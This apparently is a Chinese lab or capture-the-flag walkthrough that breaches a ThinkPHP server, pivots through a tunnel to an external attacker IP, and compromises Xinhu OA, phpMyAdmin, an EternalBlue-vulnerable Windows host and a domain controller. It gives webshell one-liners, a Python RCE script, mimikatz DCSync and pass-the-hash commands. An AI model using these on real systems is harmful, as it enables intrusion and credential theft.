一、外网打点
1.信息收集
(1)端口扫描
使用Tscan进行扫描
发现开启了SSH和HTTP服务
(2)指纹识别
使用EHole进行识别
根据信息和图标可知是ThinkPHP
2.漏洞发现
使用工具进行探测,发现漏洞
3.漏洞利用
执行命令(因为getshell功能不行)
echo '<?php @eval($_POST["x"]); ?>' >shell.php
使用蚁剑连接,成功
执行whoami命令,查看权限
发现是www-data网站用户权限,需要提权
3.提权
使用命令,显示出自己(执行sudo的使用者)的权限
sudo -l
发现mysql可以提权,使用命令进行提权
sudo mysql -e '\! /bin/sh'
查找flag文件
sudo mysql -e '\! find / -name flag*'
发现/root/flag/flag01.txt文件
4.获取flag
sudo mysql -e '\! cat /root/flag/flag01.txt'
flag01: flag{60b53231-
二、内网渗透
查看内网IP
1.内网信息收集
使用fscan进行信息收集
sudo mysql -e '\! ./fscan -h 172.22.1.0/24'
172.22.1.21是个存在永恒之蓝的Win7
172.22.1.18是个信呼OA的系统
172.22.1.2是个域控
2.Socks代理搭建
使用Stowaway搭建代理
在攻击机上开启admin
./admin -l 9999
上传agent,赋予执行权限,在目标机器上启动agent
sudo mysql -e '\! ./agent -c 120.79.150.243:9999'
在节点0开启代理
在本地的浏览器代理插件配置代理,代理服务器为开启admin的
在浏览器访问内网IP,成功访问
在kali里配置proxychains的配置文件
在kali里访问内网
3.phpmyAdmin
进行目录扫描,发现phpmyadmin
爆破出密码是root/root
SQL写wedshell
第一步先执行show variables like 'general%';
查看是否开启日志以及存放的日志位置
第二步set global general_log = ON;
开启日志
第三步set global general_log_file='C:\\phpStudy\\PHPTutorial\\www\\shell.php'
设置日志保存位置
最后select '<?php eval($_POST[cmd]);?>';
写入webshell
访问webshell,成功
4.信呼OA Nday
访问目标内网信呼OA成功
尝试出弱口令admin/admin123登录成功
后面查了一下发现信呼OA 存在一个RCE的漏洞
要准备一个1.php放在脚本相同的目录下,内容为一句话木马,内容为:<?=eval($_POST['1']);?>
import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
print(id)
print(filepath)
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)
回显出来的就是写进去一句话木马的路径,访问路径就可以执行命令,然后在蚁剑上配置一下代理,如果不配的代理话蚁剑也是没法直接访问到内网的。
flag02: 2ce3-4813-87d4-
5.永恒之蓝攻击win
由前面的fscan扫描结果知道有ms17_010漏洞
使用msf的永恒之蓝模块获取system权限的meterpreter
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit
加载 mimikatz
load kiwi
获取用户hash
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
6.横向移动
拿到所有用户的hash,172.22.1.2 的 445 端口开放,利用 smb 哈希传递,直接用 kali 自带的 crackmapexec攻击
proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
flag03: e8f88d0d43d6}
flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}
成功攻克